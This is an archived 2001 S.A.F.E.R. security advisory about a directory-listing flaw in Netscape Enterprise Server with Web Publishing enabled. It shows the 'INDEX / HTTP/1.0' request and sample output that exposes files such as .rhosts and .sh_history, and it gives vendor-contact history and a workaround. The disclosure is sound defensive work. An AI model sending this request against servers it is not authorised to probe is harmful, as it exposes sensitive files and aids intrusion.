OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
From: Security Research Team (securityRELAYGROUP.COM)
Date: Wed Jan 24 2001 - 09:41:24 CST

  • Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

    __________________________________________________________

          S.A.F.E.R. Security Bulletin 010124.EXP.1.11
    __________________________________________________________

    TITLE : Netscape Enterprise Server - INDEX request problem
    DATE : January 24, 2001
    NATURE : Information gathering
    AFFECTED : Netscape Enterprise Server 3.x and 4.x with Web Publishing enabled

    PROBLEM:

    Problems exists that allows remote user to obtain directory listings on remote site running Web Publishing.

    DETAILS:

    It is possible to obtain directory listing on the remote web server by issuing command:

    INDEX / HTTP/1.0

    Output looks like:

    -- output start --

    Trying 192.168.1.1...
    Connected to www.example.org.
    Escape character is '^]'.
    INDEX / HTTP/1.0

    HTTP/1.1 200 OK
    Server: Netscape-Enterprise/3.6 SP2
    Date: Fri, 19 Jan 2001 12:37:26 GMT
    Content-type: text/plain

    test directory 512 979859452 0 null null
    contact directory 512 979701766 0 null null
    index.html text/html 1467 979701461 268 null null
    mobile directory 512 979701775 0 null null
    service directory 512 979701801 0 null null
    .rhosts unknown 22 965727716 264 null null
    search directory 512 931316908 0 null null
    .sh_history unknown 1256 979723453 264 null null
    corporate directory 512 972989267 0 null null
    .cshrc unknown 418 975657629 264 null null
    .login unknown 674 975657629 264 null null
    .profile unknown 416 975657629 264 null null

    -- output end --

    INDEX request will not work on 'aliased' directories (like CGI directories and similar).

    FIXES:

    Netscape has been contacted on multiple occasions. First time, more than a year ago. Although other problems we have reported have been fixed, we
    have received no response for this issue - to date.

    Workaround is to disable Web Publishing, or disable INDEX request (which will, most likely, break web publishing feature).

    CREDITS:

    Emmanuel Gadaix <emmanuelrelaygroup.com>
    Vanja Hrustic <vanjarelaygroup.com>
    Fyodor Yarochkin <fyodorrelaygroup.com>

    This advisory is also available at http://www.safermag.com/advisories/

    __________________________________________________________

       S.A.F.E.R. - Security Alert For Enterprise Resources
              Copyright (c) 2001 The Relay Group
      http://www.safermag.com ---- securityrelaygroup.com
    __________________________________________________________